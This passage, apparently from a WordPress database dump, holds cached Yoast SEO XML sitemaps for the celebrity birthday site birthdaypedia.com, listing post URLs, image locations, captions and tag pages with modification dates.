Anderson]]></image:caption>\n </image:image>\n </url>\n <url>\n <loc>https://birthdaypedia.com/lindsay-lohan/</loc>\n <lastmod>2015-10-14T18:21:19+00:00</lastmod>\n <image:image>\n <image:loc>https://birthdaypedia.com/wp-content/uploads/2015/07/Linsay-Lohan.jpg</image:loc>\n <image:title><![CDATA[Linsay Lohan]]></image:title>\n <image:caption><![CDATA[Linsay Lohan]]></image:caption>\n </image:image>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tom-cruise/</loc>\n <lastmod>2015-10-14T18:21:45+00:00</lastmod>\n <image:image>\n <image:loc>https://birthdaypedia.com/wp-content/uploads/2015/07/Tom-Cruise.jpg</image:loc>\n <image:title><![CDATA[Tom Cruise]]></image:title>\n <image:caption><![CDATA[Tom Cruise]]></image:caption>\n </image:image>\n </url>\n <url>\n <loc>https://birthdaypedia.com/50-cent/</loc>\n <lastmod>2015-10-14T18:22:11+00:00</lastmod>\n <image:image>\n <image:loc>https://birthdaypedia.com/wp-content/uploads/2015/07/Singer-50-Cent.jpg</image:loc>\n <image:title><![CDATA[Singer 50 Cent]]></image:title>\n <image:caption><![CDATA[Singer 50 Cent]]></image:caption>\n </image:image>\n </url>\n <url>\n <loc>https://birthdaypedia.com/randy-jackson/</loc>\n <lastmod>2015-10-14T18:22:43+00:00</lastmod>\n <image:image>\n <image:loc>https://birthdaypedia.com/wp-content/uploads/2015/06/Randy-Jackson.jpg</image:loc>\n <image:title><![CDATA[Randy Jackson]]></image:title>\n <image:caption><![CDATA[Randy Jackson]]></image:caption>\n </image:image>\n </url>\n <url>\n <loc>https://birthdaypedia.com/ringo-starr/</loc>\n <lastmod>2015-10-14T18:23:34+00:00</lastmod>\n <image:image>\n <image:loc>https://birthdaypedia.com/wp-content/uploads/2015/07/Ringo-Starr.jpg</image:loc>\n <image:title><![CDATA[Ringo Starr]]></image:title>\n <image:caption><![CDATA[Ringo Starr]]></image:caption>\n </image:image>\n </url>\n <url>\n <loc>https://birthdaypedia.com/toby-keith/</loc>\n <lastmod>2015-10-14T18:24:12+00:00</lastmod>\n <image:image>\n <image:loc>https://birthdaypedia.com/wp-content/uploads/2015/07/Toby-Keith.jpg</image:loc>\n <image:title><![CDATA[Toby Keith]]></image:title>\n <image:caption><![CDATA[Toby Keith]]></image:caption>\n </image:image>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tom-hanks/</loc>\n <lastmod>2015-10-14T18:24:42+00:00</lastmod>\n <image:image>\n <image:loc>https://birthdaypedia.com/wp-content/uploads/2015/07/Tom-Hanks.jpg</image:loc>\n <image:title><![CDATA[Tom Hanks]]></image:title>\n <image:caption><![CDATA[Tom Hanks]]></image:caption>\n </image:image>\n </url>\n <url>\n <loc>https://birthdaypedia.com/sofia-vergara/</loc>\n <lastmod>2015-10-14T18:25:08+00:00</lastmod>\n <image:image>\n <image:loc>https://birthdaypedia.com/wp-content/uploads/2015/07/Sofia-Vergara.jpg</image:loc>\n <image:title><![CDATA[Sofia Vergara]]></image:title>\n <image:caption><![CDATA[Sofia Vergara]]></image:caption>\n </image:image>\n </url>\n <url>\n <loc>https://birthdaypedia.com/giorgio-armani/</loc>\n <lastmod>2015-10-14T18:26:10+00:00</lastmod>\n <image:image>\n <image:loc>https://birthdaypedia.com/wp-content/uploads/2015/07/Giorgio-Armani.jpg</image:loc>\n <image:title><![CDATA[Giorgio Armani]]></image:title>\n <image:caption><![CDATA[Giorgio Armani]]></image:caption>\n </image:image>\n </url>\n <url>\n <loc>https://birthdaypedia.com/matthew-fox/</loc>\n <lastmod>2015-10-14T18:29:39+00:00</lastmod>\n <image:image>\n <image:loc>https://birthdaypedia.com/wp-content/uploads/2015/07/Matthew-Fox.jpg</image:loc>\n <image:title><![CDATA[Matthew Fox]]></image:title>\n <image:caption><![CDATA[Matthew Fox]]></image:caption>\n </image:image>\n </url>\n <url>\n <loc>https://birthdaypedia.com/forest-whitaker/</loc>\n <lastmod>2015-10-14T18:30:13+00:00</lastmod>\n <image:image>\n <image:loc>https://birthdaypedia.com/wp-content/uploads/2015/07/Forest-Whitaker.jpg</image:loc>\n <image:title><![CDATA[Forest Whitaker]]></image:title>\n <image:caption><![CDATA[Forest Whitaker]]></image:caption>\n </image:image>\n </url>\n <url>\n <loc>https://birthdaypedia.com/will-ferrell/</loc>\n <lastmod>2015-10-14T18:31:05+00:00</lastmod>\n <image:image>\n <image:loc>https://birthdaypedia.com/wp-content/uploads/2015/07/Will-Ferrell.jpg</image:loc>\n <image:title><![CDATA[Will Ferrell]]></image:title>\n <image:caption><![CDATA[Will Ferrell]]></image:caption>\n </image:image>\n </url>\n <url>\n <loc>https://birthdaypedia.com/david-hasselhoff/</loc>\n <lastmod>2015-10-14T18:42:25+00:00</lastmod>\n <image:image>\n <image:loc>https://birthdaypedia.com/wp-content/uploads/2015/07/David-Hasselhoff.jpg</image:loc>\n <image:title><![CDATA[David Hasselhoff]]></image:title>\n <image:caption><![CDATA[David Hasselhoff]]></image:caption>\n </image:image>\n </url>\n <url>\n <loc>https://birthdaypedia.com/carlos-santana/</loc>\n <lastmod>2015-10-14T18:43:30+00:00</lastmod>\n <image:image>\n <image:loc>https://birthdaypedia.com/wp-content/uploads/2015/07/Carlos-Santana.jpg</image:loc>\n <image:title><![CDATA[Carlos Santana]]></image:title>\n <image:caption><![CDATA[Carlos Santana]]></image:caption>\n </image:image>\n </url>\n <url>\n <loc>https://birthdaypedia.com/robin-williams/</loc>\n <lastmod>2015-10-14T18:44:12+00:00</lastmod>\n <image:image>\n <image:loc>https://birthdaypedia.com/wp-content/uploads/2015/07/Robin-Williams.jpg</image:loc>\n <image:title><![CDATA[Robin Williams]]></image:title>\n <image:caption><![CDATA[Robin Williams]]></image:caption>\n </image:image>\n </url>\n <url>\n <loc>https://birthdaypedia.com/selena-gomez/</loc>\n <lastmod>2015-10-14T18:44:20+00:00</lastmod>\n <image:image>\n <image:loc>https://birthdaypedia.com/wp-content/uploads/2015/07/Selena-Gomez.jpg</image:loc>\n <image:title><![CDATA[Selena Gomez]]></image:title>\n <image:caption><![CDATA[Selena Gomez]]></image:caption>\n </image:image>\n </url>\n <url>\n <loc>https://birthdaypedia.com/antonio-banderas/</loc>\n <lastmod>2015-10-14T18:44:29+00:00</lastmod>\n <image:image>\n <image:loc>https://birthdaypedia.com/wp-content/uploads/2015/08/Antonio-Banderas.jpg</image:loc>\n <image:title><![CDATA[Antonio Banderas]]></image:title>\n <image:caption><![CDATA[Antonio Banderas]]></image:caption>\n </image:image>\n </url>\n <url>\n <loc>https://birthdaypedia.com/mila-kunis/</loc>\n <lastmod>2015-10-14T20:39:34+00:00</lastmod>\n <image:image>\n <image:loc>https://birthdaypedia.com/wp-content/uploads/2015/08/Mila-Kunis.jpg</image:loc>\n <image:title><![CDATA[Mila Kunis]]></image:title>\n <image:caption><![CDATA[Mila Kunis]]></image:caption>\n </image:image>\n </url>\n <url>\n <loc>https://birthdaypedia.com/sean-penn/</loc>\n <lastmod>2015-10-14T20:39:50+00:00</lastmod>\n <image:image>\n <image:loc>https://birthdaypedia.com/wp-content/uploads/2015/08/Sean-Penn.jpg</image:loc>\n <image:title><![CDATA[Sean Penn]]></image:title>\n <image:caption><![CDATA[Sean Penn]]></image:caption>\n </image:image>\n </url>\n <url>\n <loc>https://birthdaypedia.com/john-lennon-birthday/</loc>\n <lastmod>2015-10-15T15:20:20+00:00</lastmod>\n <image:image>\n <image:loc>https://birthdaypedia.com/wp-content/uploads/2015/10/John-Lennon.jpg</image:loc>\n <image:title><![CDATA[John Lennon]]></image:title>\n </image:image>\n <image:image>\n <image:loc>https://birthdaypedia.com/wp-content/uploads/2015/10/John_Lennon.jpg</image:loc>\n <image:caption><![CDATA[John_Lennon]]></image:caption>\n </image:image>\n </url>\n <url>\n <loc>https://birthdaypedia.com/mario-lopez-birthday/</loc>\n <lastmod>2015-10-15T16:41:06+00:00</lastmod>\n <image:image>\n <image:loc>https://birthdaypedia.com/wp-content/uploads/2015/10/Mario-Lopez.jpg</image:loc>\n <image:title><![CDATA[Mario Lopez]]></image:title>\n </image:image>\n <image:image>\n <image:loc>https://birthdaypedia.com/wp-content/uploads/2015/10/Mario_Lopez.jpg</image:loc>\n <image:title><![CDATA[Mario Lopez]]></image:title>\n <image:caption><![CDATA[Mario Lopez]]></image:caption>\n </image:image>\n </url>\n <url>\n <loc>https://birthdaypedia.com/anna-eleanor-roosevelt-birthday/</loc>\n <lastmod>2015-10-15T20:58:45+00:00</lastmod>\n <image:image>\n <image:loc>https://birthdaypedia.com/wp-content/uploads/2015/10/EleanorRoosevelt.jpg</image:loc>\n <image:title><![CDATA[EleanorRoosevelt]]></image:title>\n </image:image>\n <image:image>\n <image:loc>https://birthdaypedia.com/wp-content/uploads/2015/10/Eleanor_Roosevelt.jpg</image:loc>\n <image:title><![CDATA[Anna Eleanor Roosevelt]]></image:title>\n <image:caption><![CDATA[Anna Eleanor Roosevelt]]></image:caption>\n </image:image>\n <image:image>\n <image:loc>https://birthdaypedia.com/wp-content/uploads/2015/10/Eleanor-Roosevelt.jpg</image:loc>\n <image:title><![CDATA[Eleanor Roosevelt]]></image:title>\n <image:caption><![CDATA[Eleanor Roosevelt]]></image:caption>\n </image:image>\n </url>\n <url>\n <loc>https://birthdaypedia.com/hugh-jackman-birthday/</loc>\n <lastmod>2015-10-15T21:42:57+00:00</lastmod>\n <image:image>\n <image:loc>https://birthdaypedia.com/wp-content/uploads/2015/10/Hugh-Jackman.jpg</image:loc>\n <image:title><![CDATA[Hugh Jackman birthday]]></image:title>\n <image:caption><![CDATA[Hugh Jackman birthday]]></image:caption>\n </image:image>\n <image:image>\n <image:loc>https://birthdaypedia.com/wp-content/uploads/2015/10/Hugh_Jackman.jpg</image:loc>\n <image:title><![CDATA[Hugh Jackman]]></image:title>\n <image:caption><![CDATA[Hugh Jackman]]></image:caption>\n </image:image>\n </url>\n <url>\n <loc>https://birthdaypedia.com/paul-simon-birthday/</loc>\n <lastmod>2015-10-21T16:18:44+00:00</lastmod>\n <image:image>\n <image:loc>https://birthdaypedia.com/wp-content/uploads/2015/10/paul-simon-birthday.jpg</image:loc>\n <image:title><![CDATA[paul simon birthday]]></image:title>\n <image:caption><![CDATA[paul simon birthday]]></image:caption>\n </image:image>\n <image:image>\n <image:loc>https://birthdaypedia.com/wp-content/uploads/2015/10/Paul_Simon.jpg</image:loc>\n <image:title><![CDATA[Paul Simon]]></image:title>\n <image:caption><![CDATA[Paul Simon]]></image:caption>\n </image:image>\n </url>\n <url>\n <loc>https://birthdaypedia.com/dwight-eisenhower-birthday/</loc>\n <lastmod>2015-10-21T17:02:16+00:00</lastmod>\n <image:image>\n <image:loc>https://birthdaypedia.com/wp-content/uploads/2015/10/Dwight-Eisenhower-birthday.jpg</image:loc>\n <image:title><![CDATA[Dwight Eisenhower birthday]]></image:title>\n <image:caption><![CDATA[Dwight Eisenhower birthday]]></image:caption>\n </image:image>\n <image:image>\n <image:loc>https://birthdaypedia.com/wp-content/uploads/2015/10/General-of-the-Army-Dwight-D.-Eisenhower.jpg</image:loc>\n <image:title><![CDATA[General of the Army Dwight D. Eisenhower]]></image:title>\n <image:caption><![CDATA[General of the Army Dwight D. Eisenhower]]></image:caption>\n </image:image>\n </url>\n <url>\n <loc>https://birthdaypedia.com/sarah-ferguson-birthday/</loc>\n <lastmod>2015-10-30T13:59:21+00:00</lastmod>\n <image:image>\n <image:loc>https://birthdaypedia.com/wp-content/uploads/2015/10/sarah-ferguson.jpg</image:loc>\n <image:title><![CDATA[sarah ferguson]]></image:title>\n <image:caption><![CDATA[sarah ferguson]]></image:caption>\n </image:image>\n <image:image>\n <image:loc>https://birthdaypedia.com/wp-content/uploads/2015/10/Sarah_Ferguson.jpg</image:loc>\n <image:title><![CDATA[Sarah Ferguson]]></image:title>\n <image:caption><![CDATA[Sarah Ferguson]]></image:caption>\n </image:image>\n </url>\n <url>\n <loc>https://birthdaypedia.com/bryce-harper-birthday/</loc>\n <lastmod>2015-10-30T15:20:16+00:00</lastmod>\n <image:image>\n <image:loc>https://birthdaypedia.com/wp-content/uploads/2015/10/bryce-harper-birthday.jpg</image:loc>\n <image:title><![CDATA[bryce harper birthday]]></image:title>\n <image:caption><![CDATA[bryce harper birthday]]></image:caption>\n </image:image>\n <image:image>\n <image:loc>https://birthdaypedia.com/wp-content/uploads/2015/10/Bryce_Harper.jpg</image:loc>\n <image:caption><![CDATA[Bryce_Harper]]></image:caption>\n </image:image>\n <image:image>\n <image:loc>https://birthdaypedia.com/wp-content/uploads/2015/10/Bryce-Harper1.jpg</image:loc>\n <image:caption><![CDATA[Bryce-Harper]]></image:caption>\n </image:image>\n </url>\n <url>\n <loc>https://birthdaypedia.com/eminem-birthday/</loc>\n <lastmod>2015-10-30T16:04:48+00:00</lastmod>\n <image:image>\n <image:loc>https://birthdaypedia.com/wp-content/uploads/2015/10/eminems-birthday.jpg</image:loc>\n <image:title><![CDATA[eminems birthday]]></image:title>\n <image:caption><![CDATA[eminems birthday]]></image:caption>\n </image:image>\n <image:image>\n <image:loc>https://birthdaypedia.com/wp-content/uploads/2015/10/Eminem_.jpg</image:loc>\n <image:title><![CDATA[Eminem]]></image:title>\n <image:caption><![CDATA[Eminem]]></image:caption>\n </image:image>\n </url>\n <url>\n <loc>https://birthdaypedia.com/freida-pinto-birthday/</loc>\n <lastmod>2015-10-30T16:19:49+00:00</lastmod>\n <image:image>\n <image:loc>https://birthdaypedia.com/wp-content/uploads/2015/10/freida-pinto-birthday.jpg</image:loc>\n <image:title><![CDATA[freida pinto birthday]]></image:title>\n <image:caption><![CDATA[freida pinto birthday]]></image:caption>\n </image:image>\n </url>\n <url>\n <loc>https://birthdaypedia.com/evander-holyfield-birthday/</loc>\n <lastmod>2015-11-09T17:00:27+00:00</lastmod>\n <image:image>\n <image:loc>https://birthdaypedia.com/wp-content/uploads/2015/10/Evander-Holyfield.jpg</image:loc>\n <image:title><![CDATA[Evander Holyfield birthday]]></image:title>\n <image:caption><![CDATA[Evander Holyfield birthday]]></image:caption>\n </image:image>\n </url>\n <url>\n <loc>https://birthdaypedia.com/snoop-dogg-birthday/</loc>\n <lastmod>2015-11-09T17:53:09+00:00</lastmod>\n <image:image>\n <image:loc>https://birthdaypedia.com/wp-content/uploads/2015/10/snoop-dogg-birthday.jpg</image:loc>\n <image:title><![CDATA[snoop dogg birthday]]></image:title>\n <image:caption><![CDATA[snoop dogg birthday]]></image:caption>\n </image:image>\n </url>\n <url>\n <loc>https://birthdaypedia.com/kim-kardashian-birthday/</loc>\n <lastmod>2015-11-09T18:50:19+00:00</lastmod>\n <image:image>\n <image:loc>https://birthdaypedia.com/wp-content/uploads/2015/10/kim-kardashian-birthday.jpg</image:loc>\n <image:title><![CDATA[kim kardashian birthday]]></image:title>\n <image:caption><![CDATA[kim kardashian birthday]]></image:caption>\n </image:image>\n </url>\n <url>\n <loc>https://birthdaypedia.com/jeff-goldblum-birthday/</loc>\n <lastmod>2015-11-20T20:56:30+00:00</lastmod>\n <image:image>\n <image:loc>https://birthdaypedia.com/wp-content/uploads/2015/10/Jeff-Goldblum-birthday.jpg</image:loc>\n <image:title><![CDATA[Jeff Goldblum birthday]]></image:title>\n <image:caption><![CDATA[Jeff Goldblum birthday]]></image:caption>\n </image:image>\n </url>\n <url>\n <loc>https://birthdaypedia.com/johnny-carson-birthday/</loc>\n <lastmod>2015-11-23T22:00:26+00:00</lastmod>\n <image:image>\n <image:loc>https://birthdaypedia.com/wp-content/uploads/2015/10/johnny-carson-birthday.jpg</image:loc>\n <image:title><![CDATA[johnny carson birthday]]></image:title>\n <image:caption><![CDATA[johnny carson birthday]]></image:caption>\n </image:image>\n </url>\n <url>\n <loc>https://birthdaypedia.com/drake-birthday/</loc>\n <lastmod>2015-11-23T22:32:11+00:00</lastmod>\n <image:image>\n <image:loc>https://birthdaypedia.com/wp-content/uploads/2015/10/drake-birthday.jpg</image:loc>\n <image:title><![CDATA[drake birthday]]></image:title>\n <image:caption><![CDATA[drake birthday]]></image:caption>\n </image:image>\n </url>\n <url>\n <loc>https://birthdaypedia.com/pablo-picasso-birthday/</loc>\n <lastmod>2015-11-30T22:12:41+00:00</lastmod>\n <image:image>\n <image:loc>https://birthdaypedia.com/wp-content/uploads/2015/10/Pablo-Picasso-birthday.jpg</image:loc>\n <image:title><![CDATA[Pablo Picasso birthday]]></image:title>\n <image:caption><![CDATA[Pablo Picasso birthday]]></image:caption>\n </image:image>\n </url>\n <url>\n <loc>https://birthdaypedia.com/hillary-clinton-birthday/</loc>\n <lastmod>2015-11-30T22:23:08+00:00</lastmod>\n <image:image>\n <image:loc>https://birthdaypedia.com/wp-content/uploads/2015/10/hillary-clinton-birthday.jpg</image:loc>\n <image:title><![CDATA[hillary clinton birthday]]></image:title>\n <image:caption><![CDATA[hillary clinton birthday]]></image:caption>\n </image:image>\n </url>\n <url>\n <loc>https://birthdaypedia.com/jon-stewart/</loc>\n <lastmod>2016-11-23T03:16:40+00:00</lastmod>\n <image:image>\n <image:loc>https://birthdaypedia.com/wp-content/uploads/2015/11/Jon_stewart-e1479995906460.jpg</image:loc>\n <image:title><![CDATA[jon_stewart]]></image:title>\n </image:image>\n </url>\n <url>\n <loc>https://birthdaypedia.com/mark-twain/</loc>\n <lastmod>2016-11-30T03:12:17+00:00</lastmod>\n <image:image>\n <image:loc>https://birthdaypedia.com/wp-content/uploads/2015/11/Mark_Twain.jpg</image:loc>\n <image:title><![CDATA[mark_twain]]></image:title>\n </image:image>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tina-turner/</loc>\n <lastmod>2016-11-28T15:16:05+00:00</lastmod>\n <image:image>\n <image:loc>https://birthdaypedia.com/wp-content/uploads/2015/11/tina-turner1.jpg</image:loc>\n <image:title><![CDATA[tina-turner1]]></image:title>\n </image:image>\n </url>\n <url>\n <loc>https://birthdaypedia.com/jimi-hendrix/</loc>\n <lastmod>2016-11-28T15:17:19+00:00</lastmod>\n <image:image>\n <image:loc>https://birthdaypedia.com/wp-content/uploads/2015/11/jimi-hendrix1.jpg</image:loc>\n <image:title><![CDATA[jimi-hendrix1]]></image:title>\n </image:image>\n </url>\n <url>\n <loc>https://birthdaypedia.com/owen-wilson/</loc>\n <lastmod>2016-11-28T16:11:52+00:00</lastmod>\n <image:image>\n <image:loc>https://birthdaypedia.com/wp-content/uploads/2015/11/Owen-Wilson.jpg</image:loc>\n <image:title><![CDATA[owen-wilson]]></image:title>\n </image:image>\n </url>\n <url>\n <loc>https://birthdaypedia.com/robert-kennedy/</loc>\n <lastmod>2016-11-28T16:16:11+00:00</lastmod>\n <image:image>\n <image:loc>https://birthdaypedia.com/wp-content/uploads/2015/11/robert-kennedy1.jpg</image:loc>\n <image:title><![CDATA[robert-kennedy1]]></image:title>\n </image:image>\n </url>\n <url>\n <loc>https://birthdaypedia.com/danny-devito/</loc>\n <lastmod>2016-11-28T16:44:50+00:00</lastmod>\n <image:image>\n <image:loc>https://birthdaypedia.com/wp-content/uploads/2015/11/danny-devito.jpg</image:loc>\n <image:title><![CDATA[danny-devito]]></image:title>\n </image:image>\n </url>\n <url>\n <loc>https://birthdaypedia.com/lisa-bonet/</loc>\n <lastmod>2016-11-28T16:56:23+00:00</lastmod>\n <image:image>\n <image:loc>https://birthdaypedia.com/wp-content/uploads/2015/11/Lisa-Bonet.jpg</image:loc>\n <image:title><![CDATA[lisa-bonet]]></image:title>\n </image:image>\n </url>\n <url>\n <loc>https://birthdaypedia.com/lily-aldridge/</loc>\n <lastmod>2016-11-28T16:59:32+00:00</lastmod>\n <image:image>\n <image:loc>https://birthdaypedia.com/wp-content/uploads/2015/11/Lily-Aldridge.jpg</image:loc>\n <image:title><![CDATA[lily-aldridge]]></image:title>\n </image:image>\n </url>\n <url>\n <loc>https://birthdaypedia.com/prince-charles/</loc>\n <lastmod>2016-11-28T19:10:40+00:00</lastmod>\n <image:image>\n <image:loc>https://birthdaypedia.com/wp-content/uploads/2015/11/prince-charles.jpg</image:loc>\n <image:title><![CDATA[prince-charles]]></image:title>\n </image:image>\n </url>\n <url>\n <loc>https://birthdaypedia.com/whoopi-goldberg/</loc>\n <lastmod>2016-11-28T19:13:09+00:00</lastmod>\n <image:image>\n <image:loc>https://birthdaypedia.com/wp-content/uploads/2015/11/whoopi-goldberg.jpg</image:loc>\n <image:title><![CDATA[whoopi-goldberg]]></image:title>\n </image:image>\n </url>\n <url>\n <loc>https://birthdaypedia.com/leo-dicaprio/</loc>\n <lastmod>2016-11-28T19:27:19+00:00</lastmod>\n <image:image>\n <image:loc>https://birthdaypedia.com/wp-content/uploads/2015/11/leo-dicaprio2.jpg</image:loc>\n <image:title><![CDATA[leo-dicaprio2]]></image:title>\n </image:image>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tracy-morgan/</loc>\n <lastmod>2016-11-28T19:30:38+00:00</lastmod>\n <image:image>\n <image:loc>https://birthdaypedia.com/wp-content/uploads/2015/11/tracy_morgan.jpg</image:loc>\n <image:title><![CDATA[tracy_morgan]]></image:title>\n </image:image>\n </url>\n <url>\n <loc>https://birthdaypedia.com/carl-sagan/</loc>\n <lastmod>2016-11-28T22:24:03+00:00</lastmod>\n <image:image>\n <image:loc>https://birthdaypedia.com/wp-content/uploads/2016/11/carlsagan-1.jpg</image:loc>\n <image:title><![CDATA[carlsagan]]></image:title>\n </image:image>\n </url>\n <url>\n <loc>https://birthdaypedia.com/gordon-ramsay-1966-present/</loc>\n <lastmod>2016-11-28T22:30:28+00:00</lastmod>\n <image:image>\n <image:loc>https://birthdaypedia.com/wp-content/uploads/2015/11/GordonRamsay1.jpg</image:loc>\n <image:title><![CDATA[gordonramsay1]]></image:title>\n </image:image>\n </url>\n <url>\n <loc>https://birthdaypedia.com/lorde/</loc>\n <lastmod>2016-11-28T22:33:39+00:00</lastmod>\n <image:image>\n <image:loc>https://birthdaypedia.com/wp-content/uploads/2015/11/lorde.jpg</image:loc>\n <image:title><![CDATA[lorde]]></image:title>\n </image:image>\n </url>\n <url>\n <loc>https://birthdaypedia.com/lamar-odom/</loc>\n <lastmod>2016-11-28T22:40:03+00:00</lastmod>\n <image:image>\n <image:loc>https://birthdaypedia.com/wp-content/uploads/2015/11/LamarOdom.jpg</image:loc>\n <image:title><![CDATA[lamarodom]]></image:title>\n </image:image>\n </url>\n <url>\n <loc>https://birthdaypedia.com/kris-jenner/</loc>\n <lastmod>2016-11-28T22:46:49+00:00</lastmod>\n <image:image>\n <image:loc>https://birthdaypedia.com/wp-content/uploads/2015/11/KrisJenner.jpg</image:loc>\n <image:title><![CDATA[krisjenner]]></image:title>\n </image:image>\n </url>\n <url>\n <loc>https://birthdaypedia.com/jessa-duggar/</loc>\n <lastmod>2016-11-28T22:56:11+00:00</lastmod>\n <image:image>\n <image:loc>https://birthdaypedia.com/wp-content/uploads/2015/11/jessaduggar.jpg</image:loc>\n <image:title><![CDATA[jessaduggar]]></image:title>\n </image:image>\n </url>\n <url>\n <loc>https://birthdaypedia.com/kendall-jenner/</loc>\n <lastmod>2016-11-28T23:10:42+00:00</lastmod>\n <image:image>\n <image:loc>https://birthdaypedia.com/wp-content/uploads/2015/11/kendalljenner-1.jpg</image:loc>\n <image:title><![CDATA[kendalljenner]]></image:title>\n </image:image>\n </url>\n <url>\n <loc>https://birthdaypedia.com/calvin-klein/</loc>\n <lastmod>2017-06-20T16:08:48+00:00</lastmod>\n <image:image>\n <image:loc>https://birthdaypedia.com/wp-content/uploads/2015/11/calvin-klein.jpg</image:loc>\n <image:title><![CDATA[calvin-klein]]></image:title>\n </image:image>\n </url>\n <url>\n <loc>https://birthdaypedia.com/amy-adams/</loc>\n <lastmod>2017-06-20T16:08:48+00:00</lastmod>\n <image:image>\n <image:loc>https://birthdaypedia.com/wp-content/uploads/2015/08/Amy-Adams.jpg</image:loc>\n <image:title><![CDATA[Amy Adams]]></image:title>\n <image:caption><![CDATA[Amy Adams]]></image:caption>\n </image:image>\n </url>\n <url>\n <loc>https://birthdaypedia.com/edward-norton/</loc>\n <lastmod>2017-06-20T16:08:49+00:00</lastmod>\n <image:image>\n <image:loc>https://birthdaypedia.com/wp-content/uploads/2015/08/Edward-Norton.jpg</image:loc>\n <image:title><![CDATA[Edward Norton]]></image:title>\n <image:caption><![CDATA[Edward Norton]]></image:caption>\n </image:image>\n </url>\n <url>\n <loc>https://birthdaypedia.com/gerald-mcraney/</loc>\n <lastmod>2017-06-20T16:09:35+00:00</lastmod>\n <image:image>\n <image:loc>https://birthdaypedia.com/wp-content/uploads/2015/08/Gerald-McRaney.jpg</image:loc>\n <image:title><![CDATA[Gerald McRaney]]></image:title>\n <image:caption><![CDATA[Gerald McRaney]]></image:caption>\n </image:image>\n </url>\n <url>\n <loc>https://birthdaypedia.com/hayden-panettiere/</loc>\n <lastmod>2017-06-20T16:09:45+00:00</lastmod>\n <image:image>\n <image:loc>https://birthdaypedia.com/wp-content/uploads/2015/08/Hayden-Panettiere.png</image:loc>\n <image:title><![CDATA[Hayden Panettiere]]></image:title>\n <image:caption><![CDATA[Hayden Panettiere]]></image:caption>\n </image:image>\n </url>\n <url>\n <loc>https://birthdaypedia.com/rupert-grint/</loc>\n <lastmod>2017-06-20T16:09:55+00:00</lastmod>\n <image:image>\n <image:loc>https://birthdaypedia.com/wp-content/uploads/2015/08/Rupert-Grint.jpg</image:loc>\n <image:title><![CDATA[Rupert Grint]]></image:title>\n <image:caption><![CDATA[Rupert Grint]]></image:caption>\n </image:image>\n </url>\n</urlset>\";}}','no'),(107660,'_transient_timeout_yst_sm_post_tag_1:4Wt5G_5doRh','1629411764','no'),(107661,'_transient_yst_sm_post_tag_1:4Wt5G_5doRh','C:24:\"WPSEO_Sitemap_Cache_Data\":85624:{a:2:{s:6:\"status\";s:2:\"ok\";s:3:\"xml\";s:85575:\"<urlset xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xmlns:image=\"http://www.google.com/schemas/sitemap-image/1.1\" xsi:schemaLocation=\"http://www.sitemaps.org/schemas/sitemap/0.9 http://www.sitemaps.org/schemas/sitemap/0.9/sitemap.xsd http://www.google.com/schemas/sitemap-image/1.1 http://www.google.com/schemas/sitemap-image/1.1/sitemap-image.xsd\" xmlns=\"http://www.sitemaps.org/schemas/sitemap/0.9\">\n <url>\n <loc>https://birthdaypedia.com/tag/baby-i/</loc>\n <lastmod>2015-10-14T18:18:33+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/right-there/</loc>\n <lastmod>2015-10-14T18:18:33+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/101-dalmatians/</loc>\n <lastmod>2015-10-14T17:33:56+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/21-jump-street/</loc>\n <lastmod>2015-10-14T17:33:23+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/2pac-shakur/</loc>\n <lastmod>2015-10-14T17:56:47+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/34th-president/</loc>\n <lastmod>2015-10-21T17:02:16+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/80s-famous-actor/</loc>\n <lastmod>2015-10-14T18:30:13+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/a-man-for-all-seasons/</loc>\n <lastmod>2015-10-14T16:23:53+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/aaron-paul/</loc>\n <lastmod>2015-10-14T14:23:54+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/abc-network-stars/</loc>\n <lastmod>2015-10-14T18:25:08+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/about-pablo-picasso/</loc>\n <lastmod>2015-11-30T22:12:41+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/academy-awards/</loc>\n <lastmod>2017-06-20T16:08:49+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/academy-of-country-musics-artist-of-the-decade/</loc>\n <lastmod>2015-10-14T16:28:01+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/activist-actress/</loc>\n <lastmod>2015-10-14T18:20:46+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/actor/</loc>\n <lastmod>2017-06-20T16:09:55+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/actor-movies/</loc>\n <lastmod>2016-11-28T19:27:19+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/actors/</loc>\n <lastmod>2017-06-20T16:09:35+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/actors-born-in-october/</loc>\n <lastmod>2015-11-20T20:56:30+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/actrees/</loc>\n <lastmod>2015-10-14T20:39:34+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/actress/</loc>\n <lastmod>2017-06-20T16:09:45+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/adam-sandler/</loc>\n <lastmod>2015-10-09T16:52:06+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/age-hillary-clinton/</loc>\n <lastmod>2015-11-30T22:23:08+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/alfred-hitchcock/</loc>\n <lastmod>2015-10-14T14:14:03+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/all-times-gratest-pop-singer/</loc>\n 